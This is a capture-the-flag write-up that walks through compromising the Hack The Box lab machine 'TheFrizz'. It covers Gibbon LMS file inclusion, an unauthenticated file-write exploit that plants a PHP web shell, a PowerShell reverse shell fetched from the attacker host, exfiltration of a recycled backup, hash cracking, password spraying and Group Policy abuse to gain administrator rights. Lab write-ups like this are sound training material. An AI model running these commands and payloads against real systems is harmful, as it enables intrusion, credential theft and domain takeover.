TheFrizz

Recon

HTTP (80)

frizz.htb redirects to frizzdc.frizz.htb which is just a landing page website.

Gibbon LMS

/Gibbon-LMS/ is serving Staff Login panel.

LFI

Gibbon v25.0.0 is vulnerable to a Local File Inclusion - CVE-2023-34598

Test: http://frizzdc.frizz.htb/Gibbon-LMS/?q=gibbon.sql

Download files

from requests import Session
from bs4 import BeautifulSoup as BS
from pathlib import Path

SAVE = Path('LFI Exfiltrate')
URL = 'http://frizzdc.frizz.htb/Gibbon-LMS/'

SAVE.mkdir(exist_ok=True)
with Session() as session:
    while True:
        file = input('Filename: ')
        resp = session.get(URL, params={'q': file})
        if 'the Gibbons have escaped!' in resp.text:
            print("No such file")
            continue

        contents = BS(resp.text, 'html.parser').find('div', {'id': 'content'}).get_text(strip=True)
        with open(SAVE / Path(file).name, 'w') as f:
            f.write(contents)
        print(f"Contents: {contents[:100]}")

└─$ sudo mysql -u root
CREATE DATABASE gibbon;
CREATE USER 'gibbon_user'@'localhost' IDENTIFIED BY 'gibbon_user';
GRANT ALL PRIVILEGES ON gibbon.* TO 'gibbon_user'@'localhost';
FLUSH PRIVILEGES;
USE gibbon;
SOURCE ./LFI Exfiltrate/gibbon.sql

Nothing in the database..

Except maybe potential username format used in DC?

└─$ feroxbuster -u 'http://frizzdc.frizz.htb/Gibbon-LMS/?q=' -k -w /usr/share/seclists/Discovery/Web-Content/common.txt --thorough -n -D -C 404,403,400 -S 0,34
200      GET      674l     5642w    35113c http://frizzdc.frizz.htb/Gibbon-LMS/LICENSE
301      GET        9l       30w      361c http://frizzdc.frizz.htb/Gibbon-LMS/Resources => http://frizzdc.frizz.htb/Gibbon-LMS/Resources/
301      GET        9l       30w      358c http://frizzdc.frizz.htb/Gibbon-LMS/Themes => http://frizzdc.frizz.htb/Gibbon-LMS/Themes/
301      GET        9l       30w      361c http://frizzdc.frizz.htb/Gibbon-LMS/installer => http://frizzdc.frizz.htb/Gibbon-LMS/installer/
200      GET      363l     1014w    22064c http://frizzdc.frizz.htb/Gibbon-LMS/index.php
301      GET        9l       30w      355c http://frizzdc.frizz.htb/Gibbon-LMS/lib => http://frizzdc.frizz.htb/Gibbon-LMS/lib/
200      GET      674l     5642w    35113c http://frizzdc.frizz.htb/Gibbon-LMS/license
301      GET        9l       30w      359c http://frizzdc.frizz.htb/Gibbon-LMS/modules => http://frizzdc.frizz.htb/Gibbon-LMS/modules/
200      GET        7l       39w      374c http://frizzdc.frizz.htb/Gibbon-LMS/preferences.php
200      GET        9l       55w      524c http://frizzdc.frizz.htb/Gibbon-LMS/privacypolicy.php
301      GET        9l       30w      361c http://frizzdc.frizz.htb/Gibbon-LMS/resources => http://frizzdc.frizz.htb/Gibbon-LMS/resources/
200      GET       54l      171w     2617c http://frizzdc.frizz.htb/Gibbon-LMS/report.php
200      GET        4l        8w       54c http://frizzdc.frizz.htb/Gibbon-LMS/robots.txt
200      GET        7l       39w      380c http://frizzdc.frizz.htb/Gibbon-LMS/notifications.php
301      GET        9l       30w      355c http://frizzdc.frizz.htb/Gibbon-LMS/src => http://frizzdc.frizz.htb/Gibbon-LMS/src/
301      GET        9l       30w      358c http://frizzdc.frizz.htb/Gibbon-LMS/themes => http://frizzdc.frizz.htb/Gibbon-LMS/themes/
301      GET        9l       30w      359c http://frizzdc.frizz.htb/Gibbon-LMS/uploads => http://frizzdc.frizz.htb/Gibbon-LMS/uploads/
200      GET     1364l     2928w    25809c http://frizzdc.frizz.htb/Gibbon-LMS/themes/Default/css/main.css
200      GET       16l       57w      660c http://frizzdc.frizz.htb/Gibbon-LMS/update.php
301      GET        9l       30w      358c http://frizzdc.frizz.htb/Gibbon-LMS/vendor => http://frizzdc.frizz.htb/Gibbon-LMS/vendor/
200      GET       17l      192w    10137c http://frizzdc.frizz.htb/Gibbon-LMS/resources/assets/css/theme.min.css
200      GET      137l     1035w    85530c http://frizzdc.frizz.htb/Gibbon-LMS/themes/Default/img/logo.png
200      GET       17l     1449w   863561c http://frizzdc.frizz.htb/Gibbon-LMS/resources/assets/css/core.min.css
200      GET       53l      226w     2845c http://frizzdc.frizz.htb/Gibbon-LMS/error.php

We basically have access to all files from repository: https://github.com/GibbonEdu/core/tree/v25.0.00

.. is blocked, so no LFI outside application.

https://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=Gibbon

Arbitrary File Write

CVE-2023-45878: GibbonEdu Gibbon version 25.0.1 and before allows Arbitrary File Write because rubrics_visualise_saveAjax.phps does not require authentication. The endpoint accepts the img, path, and gibbonPersonID parameters. The img parameter is expected to be a base64 encoded image. If the path parameter is set, the defined path is used as the destination folder, concatenated with the absolute path of the installation directory. The content of the img parameter is base64 decoded and written to the defined file path. This allows creation of PHP files that permit Remote Code Execution (unauthenticated).

https://github.com/advisories/GHSA-r526-pvv3-w6p8 -> https://herolab.usd.de/security-advisories/usd-2023-0025/

File exists

└─$ curl http://frizzdc.frizz.htb/Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php -i
HTTP/1.1 200 OK
Date: Sun, 16 Mar 2025 10:49:11 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Set-Cookie: G60fa1cd0af7be78b=82pclbkbt74720uk1r30avct0v; path=/; HttpOnly; SameSite=Lax
X-Frame-Options: SAMEORIGIN
Pragma: no-cache
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Length: 0
Content-Type: text/html; charset=UTF-8

Use PoC to upload a shell

└─$ echo -n '<?php echo system($_REQUEST[0]); ?>' | basenc --base64url
PD9waHAgZWNobyBzeXN0ZW0oJF9SRVFVRVNUWzBdKTsgPz4=

└─$ curl http://frizzdc.frizz.htb/Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php -d 'img=image/png;asdf,PD9waHAgZWNobyBzeXN0ZW0oJF9SRVFVRVNUWzBdKTsgPz4=&path=letmein.php&gibbonPersonID=0000000001'
letmein.php

Test uploaded shell

└─$ curl http://frizzdc.frizz.htb/Gibbon-LMS/letmein.php -d '0=whoami'
frizz\w.webservice

HTB cronjob deletes the web shell so it's better to upload reverse shell.

└─$ cp /opt/scripts/shells/ConPtyShell/Invoke-ConPtyShell.ps1 .
└─$ echo 'Invoke-ConPtyShell 10.10.14.18 4444;' >> Invoke-ConPtyShell.ps1
└─$ curl http://frizzdc.frizz.htb/Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php -d "img=image/png;asdf,$(echo '<?php echo system($_REQUEST[0]); ?>' | basenc --base64url)&path=letmein.php&gibbonPersonID=0000000001"
└─$ curl http://frizzdc.frizz.htb/Gibbon-LMS/letmein.php --data-urlencode '0=powershell -c IEX(IWR 10.10.14.18/Invoke-ConPtyShell.ps1 -UseBasicParsing)'

Note: Make sure you have a listener and webserver up and running.

Reverse Shell (w.webservice)

└─$ stty raw -echo; (stty size; cat) | nc -lvnp 4444
listening on [any] 4444 ... connect to [10.10.14.18] from (UNKNOWN) [10.129.123.117] 65511
PS C:\xampp\htdocs\Gibbon-LMS> whoami /all

User Name          SID
================== ==============================================
frizz\w.webservice S-1-5-21-2386970044-1145388522-2932701813-1120

Group Name                                 Type             SID          Attributes
========================================== ================ ============ ==================================================
Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE                       Well-known group S-1-5-6      Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                              Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
LOCAL                                      Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1     Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288

Privilege Name                Description                    State
============================= ============================== ========
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeCreateGlobalPrivilege       Create global objects          Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled

Get application config

PS C:\xampp\htdocs\Gibbon-LMS> cat .\config.php
...
$databaseServer = 'localhost';
$databaseUsername = 'MrGibbonsDB';
$databasePassword = 'MisterGibbs!Parrot!?1';
$databaseName = 'gibbon';
...

Interestingly access to /Users is disabled, and mysql binary doesn't seem to exist on system.

PS C:\xampp\htdocs\Gibbon-LMS> ls /Users
ls : Access to the path 'C:\Users' is denied.
At line:1 char:1
+ ls /Users
+ ~~~~~~~~~
    + CategoryInfo          : PermissionDenied: (C:\Users:String) [Get-ChildItem], UnauthorizedAccessException
    + FullyQualifiedErrorId : DirUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand

Correction, mysql exists but it's not included in PATH

PS C:\xampp> ls .\mysql\bin\mysql.exe
Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----        10/30/2023   5:58 AM        3784616 mysql.exe

PS C:\xampp> \xampp\mysql\bin\mysql.exe -u'MrGibbonsDB' -p'MisterGibbs!Parrot!?1' gibbon -e 'SHOW DATABASES;'
+--------------------+
| Database           |
+--------------------+
| gibbon             |
| information_schema |
| test               |
+--------------------+
PS C:\xampp> \xampp\mysql\bin\mysql.exe -u'MrGibbonsDB' -p'MisterGibbs!Parrot!?1' gibbon -e 'SHOW TABLES;'
...
PS C:\xampp> \xampp\mysql\bin\mysql.exe -u'MrGibbonsDB' -p'MisterGibbs!Parrot!?1' gibbon -e 'SELECT username,passwordStrong,passwordStrongSalt FROM gibbonperson'
+-----------+------------------------------------------------------------------+------------------------+
| username  | passwordStrong                                                   | passwordStrongSalt     |
+-----------+------------------------------------------------------------------+------------------------+
| f.frizzle | 067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03 | /aACFhikmNopqrRTVz2489 |
+-----------+------------------------------------------------------------------+------------------------+

# Format = HASH:SALT
➜ cat .\hashes.txt
067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03:/aACFhikmNopqrRTVz2489

➜ .\hashcat.exe --identify .\hashes.txt
      # | Name                                                       | Category
  ======+============================================================+======================================
   1410 | sha256($pass.$salt)                                        | Raw Hash salted and/or iterated
   1420 | sha256($salt.$pass)                                        | Raw Hash salted and/or iterated
  22300 | sha256($salt.$pass.$salt)                                  | Raw Hash salted and/or iterated
  20720 | sha256($salt.sha256($pass))                                | Raw Hash salted and/or iterated
  21420 | sha256($salt.sha256_bin($pass))                            | Raw Hash salted and/or iterated
   1440 | sha256($salt.utf16le($pass))                               | Raw Hash salted and/or iterated
  20710 | sha256(sha256($pass).$salt)                                | Raw Hash salted and/or iterated
   1430 | sha256(utf16le($pass).$salt)                               | Raw Hash salted and/or iterated
   1450 | HMAC-SHA256 (key = $pass)                                  | Raw Hash authenticated
   1460 | HMAC-SHA256 (key = $salt)                                  | Raw Hash authenticated
  11750 | HMAC-Streebog-256 (key = $pass), big-endian                | Raw Hash authenticated
  11760 | HMAC-Streebog-256 (key = $salt), big-endian                | Raw Hash authenticated
➜ .\hashcat.exe -a 0 -m 1410 .\hashes.txt .\rockyou.txt
Failed...
➜ .\hashcat.exe -a 0 -m 1420 .\hashes.txt .\rockyou.txt
067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03:/aACFhikmNopqrRTVz2489:Jenni_Luvs_Magic23

Creds: f.frizzle:Jenni_Luvs_Magic23

HTTP (80) (Authenticated)

Credentials work for Gibbon, but there's nothing too interesting

Hmm... something about migrations

SMB

STATUS_NOT_SUPPORTED usually means Kerberos is required to authenticate in DC.

└─$ netexec smb frizzdc.frizz.htb -u f.frizzle -p 'Jenni_Luvs_Magic23'
SMB         10.129.123.117  445    10.129.123.117   [*]  x64 (name:10.129.123.117) (domain:10.129.123.117) (signing:True) (SMBv1:False)
SMB         10.129.123.117  445    10.129.123.117   [-] 10.129.123.117\f.frizzle:Jenni_Luvs_Magic23 STATUS_NOT_SUPPORTED

└─$ netexec smb frizzdc.frizz.htb -u f.frizzle -p 'Jenni_Luvs_Magic23' -k
SMB         frizzdc.frizz.htb 445    frizzdc          [*]  x64 (name:frizzdc) (domain:frizz.htb) (signing:True) (SMBv1:False)
SMB         frizzdc.frizz.htb 445    frizzdc          [-] frizz.htb\f.frizzle:Jenni_Luvs_Magic23 KRB_AP_ERR_SKEW

Fix clock skew and login

└─$ sudo ntpdate frizz.htb
2025-03-16 07:54:29.839372 (-0400) +25199.747085 +/- 0.035767 frizz.htb 10.129.123.117 s1 no-leap
CLOCK: time stepped by 25199.747085

└─$ echo $(( 25199.747085 / 3600 ))
6.9999297458333327

└─$ faketime -f +7h netexec smb frizzdc.frizz.htb -u f.frizzle -p 'Jenni_Luvs_Magic23' -k --shares
SMB         frizzdc.frizz.htb 445    frizzdc          [*]  x64 (name:frizzdc) (domain:frizz.htb) (signing:True) (SMBv1:False)
SMB         frizzdc.frizz.htb 445    frizzdc          [+] frizz.htb\f.frizzle:Jenni_Luvs_Magic23
SMB         frizzdc.frizz.htb 445    frizzdc          [*] Enumerated shares
SMB         frizzdc.frizz.htb 445    frizzdc          Share           Permissions     Remark
SMB         frizzdc.frizz.htb 445    frizzdc          -----           -----------     ------
SMB         frizzdc.frizz.htb 445    frizzdc          ADMIN$                          Remote Admin
SMB         frizzdc.frizz.htb 445    frizzdc          C$                              Default share
SMB         frizzdc.frizz.htb 445    frizzdc          IPC$            READ            Remote IPC
SMB         frizzdc.frizz.htb 445    frizzdc          NETLOGON        READ            Logon server share
SMB         frizzdc.frizz.htb 445    frizzdc          SYSVOL          READ            Logon server share

netexec winrm was failing to login 🤔

└─$ faketime -f +7h netexec winrm frizzdc.frizz.htb -u f.frizzle -p 'Jenni_Luvs_Magic23' -k
[07:55:51] ERROR    Exception while calling proto_flow() on target frizzdc.frizz.htb: ("Unpacked data doesn't match constant value 'b')\\xea\\xdbz\\xba,'' should be ''NTLMSSP\\x00''", 'When    connection.py:176 unpacking field \' | "NTLMSSP\x00 | b\')\\xea\\xdbz\\xba,\'[:8]\'')

WinRM (f.frizzle)

Configure kerberos (configure_krb5.py)

└─$ /opt/scripts/utils/configure_krb5.py frizz.htb frizzdc
[*] This script must be run as root
[*] Configuration Data:
[libdefault]
        default_realm = FRIZZ.HTB

[realms]
        FRIZZ.HTB = {
                kdc = frizzdc.frizz.htb
                admin_server = frizzdc.frizz.htb
        }

[domain_realm]
        frizz.htb = FRIZZ.HTB
        .frizz.htb = FRIZZ.HTB


[!] Above Configuration will overwrite /etc/krb5.conf, are you sure? [y/N] y
[+] /etc/krb5.conf has been configured

From the future: TIL NetExec > SMB protocol Enumeration > Generate krb5 conf file

└─$ faketime -f +7h impacket-getTGT -dc-ip 'frizzdc.frizz.htb' 'frizz.htb'/'f.frizzle':'Jenni_Luvs_Magic23' -k
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in f.frizzle.ccache

└─$ export KRB5CCNAME=$(readlink -f ./f.frizzle.ccache)
└─$ faketime -f +7h evil-winrm -i frizzdc.frizz.htb -r frizz.htb
Evil-WinRM shell v3.5
*Evil-WinRM* PS C:\Users\f.frizzle\Documents> whoami /all

User Name       SID
=============== ==============================================
frizz\f.frizzle S-1-5-21-2386970044-1145388522-2932701813-1103

Group Name                                 Type             SID          Attributes
========================================== ================ ============ ==================================================
Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1     Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level     Label            S-1-16-8192

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

From the future about SSH -> Weird flex from Windows I guess

Works: faketime -f +7h ssh f.frizzle@frizzdc.frizz.htb Doesn't Work: faketime -f +7h ssh f.frizzle@frizz.htb (No DC)

Also note about SSH, if you make yourself admin you no longer can SSH... 😳

*Evil-WinRM* PS C:\Users\M.SchoolBus\Documents> cat \ProgramData\ssh\sshd_config | sls -notmatch '#|^$'
LoginGraceTime 1m
PermitRootLogin no
StrictModes yes
MaxSessions 3
PubkeyAuthentication no
AuthorizedKeysFile      .ssh/authorized_keys
HostbasedAuthentication no
IgnoreUserKnownHosts yes
IgnoreRhosts yes
PasswordAuthentication no
PermitEmptyPasswords no
GSSAPIAuthentication yes
AllowAgentForwarding no
AllowTcpForwarding no
PermitTTY yes
PrintMotd yes
ClientAliveInterval 120
ClientAliveCountMax 3
PermitTunnel no
Banner "This is a production server, not a field trip. Please be responsible. -Marvin"
Subsystem       sftp    sftp-server.exe
Subsystem powershell C:/progra~1/powershell/7/pwsh.exe -sshs
Match Group administrators
       AuthorizedKeysFile __PROGRAMDATA__/ssh/administrators_authorized_keys
DenyGroups "Frizz/Administrators"
AllowGroups "Frizz/Remote Management Users"
AllowUsers Frizz/m.schoolbus Frizz/f.frizzle

User.txt

*Evil-WinRM* PS C:\Users\f.frizzle> cat Desktop/user.txt
d85a04eb3d8b99b16c2b76df607701d8

WinRM (M.SchoolBus)

Enumerate with winpeas

*Evil-WinRM* PS C:\Users\f.frizzle\Music> curl.exe 10.10.14.18/wp.exe -O
*Evil-WinRM* PS C:\Users\f.frizzle\Music> .\wp.exe | tee -filepath wp.log
...
ÉÍÍÍÍÍÍÍÍÍÍ¹ Scheduled Applications --Non Microsoft--
È Check if you can modify other users scheduled binaries https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.html
    (frizz\administrator) Frizz-Cleanup: powershell -e c2V0LWNvbnRlbnQgLXZhbHVlICI5YTQyZGU2YzM0YjU0YWRjYjc0MWFiYmIyNzAwZGQ4MiIgLXBhdGggImM6XHVzZXJzXGYuZnJpenpsZVxkZXNrdG9wXHVzZXIudHh0Igokc2hlbGw9bmV3LW9iamVjdCAtY29tIHNoZWxsLmFwcGxpY2F0aW9uCiRiaW4gPSAkc2hlbGwubmFtZXNwYWNlKDB4YSkKaWYoKGAkYmluLml0ZW1zKCl8bWVhc3VyZSkuY291bnQgLWx0IDEpewokaXRlbSA9ICRzaGVsbC5uYW1lc3BhY2UoMCkucGFyc2VuYW1lKCJDOlx1c2Vyc1xmLmZyaXp6bGVcQXBwRGF0YVxMb2NhbFxUZW1wXE15TWlsZXNfQmV0YS56aXAiKQokaXRlbS5pbnZva2V2ZXJiKCJkZWxldGUiKQ==
    Trigger: At system startup-After triggered, repeat every 00:05:00 indefinitely.

Recycle Bin

Cronjob:

set-content -value "9a42de6c34b54adcb741abbb2700dd82" -path "c:\users\f.frizzle\desktop\user.txt"
$shell=new-object -com shell.application
$bin = $shell.namespace(0xa)
if((`$bin.items()|measure).count -lt 1){
$item = $shell.namespace(0).parsename("C:\users\f.frizzle\AppData\Local\Temp\MyMiles_Beta.zip")
$item.invokeverb("delete")

The above file doesn't exist and after waiting for few minutes it doesn't appear so there's no cronjob which does backups or smth.

Using the Shell.Application COM object, $shell.Namespace(0xA) refers to the Recycle Bin.

But there's something else in Recycle Bin

PS C:\users\f.frizzle\music> (New-Object -ComObject Shell.Application).Namespace(0xA).Items() | Format-Table Name, Path
Name                  Path
----                  ----
wapt-backup-sunday.7z C:\$RECYCLE.BIN\S-1-5-21-2386970044-1145388522-2932701813-1103\$RE2XMEG.7z

I wasn't able to make impacket-smbserver work, so to download I created simple server which accepts files.

from flask import Flask, request
from pathlib import Path

SAVE_LOCATION = Path('./www')
SAVE_LOCATION.mkdir(exist_ok=True)

app = Flask(__name__)

@app.route('/', methods=['POST'])
def upload_file():
    if 'file' not in request.files:
        return 'No file part', 400

    file = request.files['file']
    if file.filename == '':
        return 'No selected file', 400

    if file:
        filename = Path(file.filename).name
        file.save(SAVE_LOCATION / filename)
        return 'File uploaded successfully', 200

if __name__ == '__main__':
    app.run(host='0.0.0.0', port=8000, debug=False)

PS C:\users\f.frizzle\music> curl.exe 10.10.14.18:8000 -F 'file=@wapt-backup-sunday.7z'
File uploaded successfully

WAPT

Unzip

└─$ 7z x wapt-backup-sunday.7z

Project seems to be using https://github.com/tranquilit/WAPT: WAPT is an established method for managing the lifecycle of an installed base of Windows applications. WAPT has many similarities with Debian's APT software manager, thus its name. WAPT is particularly useful to system administrators who are tired of repetitive and low value tasks.

Not sure what kind of modifications have been made to project, but there's configuration which contains password

It's somewhat password like password ?

└─$ echo 'IXN1QmNpZ0BNZWhUZWQhUgo=' | base64 -d
!suBcig@MehTed!R

Password Reuse

Get other users

PS C:\users\f.frizzle\music> Get-LocalUser | Select-Object -ExpandProperty Name
Administrator
Guest
krbtgt
f.frizzle
w.li
h.arm
M.SchoolBus
d.hudson
k.franklin
l.awesome
t.wright
r.tennelli
J.perlstein
a.perlstein
p.terese
v.frizzle
g.frizzle
c.sandiego
c.ramon
m.ramon
w.Webservice

Test for password reuse.

└─$ faketime -f +7h netexec smb frizzdc.frizz.htb -u users.txt -p '!suBcig@MehTed!R' -k --continue-on-success
...
SMB         frizzdc.frizz.htb 445    frizzdc          [+] frizz.htb\M.SchoolBus:!suBcig@MehTed!R
...

Shell

└─$ faketime -f +7h impacket-getTGT -dc-ip 'frizzdc.frizz.htb' 'frizz.htb'/'M.SchoolBus':'!suBcig@MehTed!R' -k
└─$ export KRB5CCNAME=$(readlink -f ./M.SchoolBus.ccache)
└─$ faketime -f +7h evil-winrm -i frizzdc.frizz.htb -r frizz.htb
*Evil-WinRM* PS C:\Users\M.SchoolBus\Documents> whoami /all

User Name         SID
================= ==============================================
frizz\m.schoolbus S-1-5-21-2386970044-1145388522-2932701813-1106

Group Name                                   Type             SID                                            Attributes
============================================ ================ ============================================== ===============================================================
Everyone                                     Well-known group S-1-1-0                                        Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users              Alias            S-1-5-32-580                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                                Alias            S-1-5-32-545                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access   Alias            S-1-5-32-554                                   Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                         Well-known group S-1-5-2                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users             Well-known group S-1-5-11                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization               Well-known group S-1-5-15                                       Mandatory group, Enabled by default, Enabled group
frizz\Desktop Admins                         Group            S-1-5-21-2386970044-1145388522-2932701813-1121 Mandatory group, Enabled by default, Enabled group
frizz\Group Policy Creator Owners            Group            S-1-5-21-2386970044-1145388522-2932701813-520  Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity   Well-known group S-1-18-1                                       Mandatory group, Enabled by default, Enabled group
frizz\Denied RODC Password Replication Group Alias            S-1-5-21-2386970044-1145388522-2932701813-572  Mandatory group, Enabled by default, Enabled group, Local Group
Mandatory Label\Medium Mandatory Level       Label            S-1-16-8192

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

Get data for bloodhound

└─$ faketime -f +7h bloodhound-python -u 'M.SchoolBus' -p '!suBcig@MehTed!R' -d frizz.htb -ns 10.129.123.117 -dc frizzdc.frizz.htb -c all --zip -k
INFO: Found AD domain: frizz.htb
INFO: Using TGT from cache
INFO: Found TGT with correct principal in ccache file.
INFO: Connecting to LDAP server: frizzdc.frizz.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: frizzdc.frizz.htb
INFO: Found 22 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 2 ous
INFO: Found 20 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: frizzdc.frizz.htb
INFO: Done in 00M 16S
INFO: Compressing output into 20250316112848_bloodhound.zip

The owned users don't have any outbound permissions, let's check groups.

Group Policy Creator Owners: This group is authorized to create, edit, and delete Group Policy Objects in the domain. By default, the only member of the group is Administrator.

https://www.thehacker.recipes/ad/movement/group-policies

PS C:\Users\M.SchoolBus\Documents> Get-GPO -All
DisplayName      : Default Domain Policy
DomainName       : frizz.htb
Owner            : frizz\Domain Admins
Id               : 31b2f340-016d-11d2-945f-00c04fb984f9
GpoStatus        : AllSettingsEnabled
Description      :
CreationTime     : 10/29/2024 7:19:24 AM
ModificationTime : 10/29/2024 7:25:44 AM
UserVersion      : AD Version: 0, SysVol Version: 0
ComputerVersion  : AD Version: 2, SysVol Version: 2
WmiFilter        :

DisplayName      : Default Domain Controllers Policy
DomainName       : frizz.htb
Owner            : frizz\Domain Admins
Id               : 6ac1786c-016f-11d2-945f-00c04fb984f9
GpoStatus        : AllSettingsEnabled
Description      :
CreationTime     : 10/29/2024 7:19:24 AM
ModificationTime : 10/29/2024 7:19:24 AM
UserVersion      : AD Version: 0, SysVol Version: 0
ComputerVersion  : AD Version: 1, SysVol Version: 1
WmiFilter        :
PS C:\Users\M.SchoolBus\Documents> New-GPO -Name "Nothing2See"
DisplayName      : Nothing2See
DomainName       : frizz.htb
Owner            : frizz\M.SchoolBus
Id               : 41f36df0-1662-49f9-bdb9-968a54ac3073
GpoStatus        : AllSettingsEnabled
Description      :
CreationTime     : 3/16/2025 10:22:14 AM
ModificationTime : 3/16/2025 10:22:14 AM
UserVersion      : AD Version: 0, SysVol Version: 0
ComputerVersion  : AD Version: 0, SysVol Version: 0
WmiFilter        :

└─$ curl -LOs https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/26a0757612e5654b4f792b012ab8f10f95d391c9/Recon/PowerView.ps1
*Evil-WinRM* PS C:\Users\M.SchoolBus\Documents> IEX(IWR 10.10.14.18/PowerView.ps1 -UseBasicParsing)
PS C:\Users\M.SchoolBus\Documents> New-GPOImmediateTask -Verbose -Force -TaskName 'Test' -GPODisplayName 'Nothing2See' -Command cmd -CommandArguments "/c net user letmein Password123 /add /domain && net group 'Domain Admins' letmein /add /domain && net group 'Enterprise Admins' letmein /add /domain && net localgroup Administrators letmein /add && net localgroup 'Remote Management Users' letmein /add"
VERBOSE: Get-DomainSearcher search string: LDAP://DC=frizz,DC=htb
VERBOSE: Trying to weaponize GPO: {41F36DF0-1662-49F9-BDB9-968A54AC3073}
PS C:\Users\M.SchoolBus\Documents> gpupdate /force
Updating policy...

Computer Policy update has completed successfully.
User Policy update has completed successfully.

Note: Use the version provided in HackerRecipies, because latest PowerView doesn't have this function.

With PowerView nothing was changed or updated...

pyGPOAbuse also kept failing due to connection errors

└─$ faketime -f +7h pygpoabuse 'frizz.htb'/'M.SchoolBus':'!suBcig@MehTed!R' -gpo-id '8a6ec73d-b29a-447b-b820-3057f389393c' -command 'net user letmein Password123$ /add' -f -v -k -ccache M.SchoolBus.ccache

└─$ cp /opt/scripts/exploit/SharpGPOAbuse/SharpGPOAbuse.exe ./www

PS C:\Users\M.SchoolBus\Music> curl.exe 10.10.14.18/SharpGPOAbuse.exe -O

PS C:\Users\M.SchoolBus\Music> New-GPO -Name "Nothing2See"
PS C:\Users\M.SchoolBus\Music> .\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount m.schoolbus --GPOName "Nothing2See"
[+] Domain = frizz.htb
[+] Domain Controller = frizzdc.frizz.htb
[+] Distinguished Name = CN=Policies,CN=System,DC=frizz,DC=htb
[+] SID Value of m.schoolbus = S-1-5-21-2386970044-1145388522-2932701813-1106
[+] GUID of "Nothing2See" is: {3AC5E58D-A78C-4182-85CE-728C73222475}
[+] Creating file \\frizz.htb\SysVol\frizz.htb\Policies\{3AC5E58D-A78C-4182-85CE-728C73222475}\Machine\Microsoft\Windows NT\SecEdit\GptTmpl.inf
[+] versionNumber attribute changed successfully
[+] The version number in GPT.ini was increased successfully.
[+] The GPO was modified to include a new local admin. Wait for the GPO refresh cycle.
[+] Done!

*Evil-WinRM* PS C:\Users\M.SchoolBus\Music> gpupdate /force
Updating policy...
Computer Policy update has completed successfully.
User Policy update has completed successfully.

Still nothing. After going over few things I found https://github.com/3gstudent/Homework-of-Powershell/tree/master?tab=readme-ov-file#new-gpoimmediatetaskps1. New-GPO only creates GPO and never applies to domain itself, hence it was failing since it was never listed in GPO Update.

New-GPO "Nothing2See" | New-GPLink -Target "dc=frizz,dc=htb"
\Users\M.SchoolBus\Music\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount m.schoolbus --GPOName "Nothing2See" --Force
gpupdate /force

whoami /groups | sls Administrators
BUILTIN\Administrators                       Alias            S-1-5-32-544                                   Mandatory group, Enabled by default, Enabled group, Group owner

Root.txt

PS C:\Users\M.SchoolBus\Music> cat /Users/Administrator/Desktop/root.txt
